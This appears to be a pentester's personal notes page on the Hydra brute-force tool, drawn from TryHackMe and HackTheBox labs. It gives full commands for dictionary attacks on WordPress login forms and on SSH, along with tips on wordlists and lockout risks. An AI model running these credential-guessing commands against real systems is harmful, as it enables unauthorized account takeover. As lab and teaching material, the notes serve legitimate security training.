hydra

Link

Software Link

How I used it

Hydra is the tools I use for my password dictionary attacks against all those pesky web app login forms, assuming I don’t write my script. But wait, there is more! It also does other protocols that I don’t feel like scripting like ssh.

Proof

• THM Hackpark - Cracking website admin passwords.
• THM Mr. Robot - Brute-forcing Wordpress username.
• HTB Dog - Break into the SSH protocol.

Commands I Use Most

Cracking Passwords

┌──(kali㉿kali)-[~/Documents/thm/mrrobot]
└─$ hydra -l Elliot -P fsocity.dic 10.10.145.112 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.11.55%2Fwp-admin%2F&testcookie=1:The password you entered"

  

Brute-force Username

┌──(kali㉿kali)-[~/Documents/thm/mrrobot]
└─$ hydra -L fsocity.dic -p admin 10.10.11.55 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.11.55%2Fwp-admin%2F&testcookie=1:Invalid Username"

  

Break into SSH

┌──(kali㉿kali)-[~/Documents/htb/dog]
└─$ hydra -l tiffany -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt -t 4 10.10.11.58 ssh

  

What I learned the Hard Way

Wordlist Selection Matters
Choose those wordlists carefully. Seclists offers a bunch to play with running. You can also use CEWL to generate a custom wordlist.

Choose the Right Fail Check
Consider what you choose as the fail check. There have been boxes where I wasted a couple hours because hydra was the right vector but didn’t work because it didn’t know the right password was right.

When hydra Let Me Down

Brute-force protections are a thing. Sometimes, five incorrect passwords will get your account locked, or worse IP banned. Not fun calling your customer to let them know you locked yourself out. Be mindful when you choose to brute-force.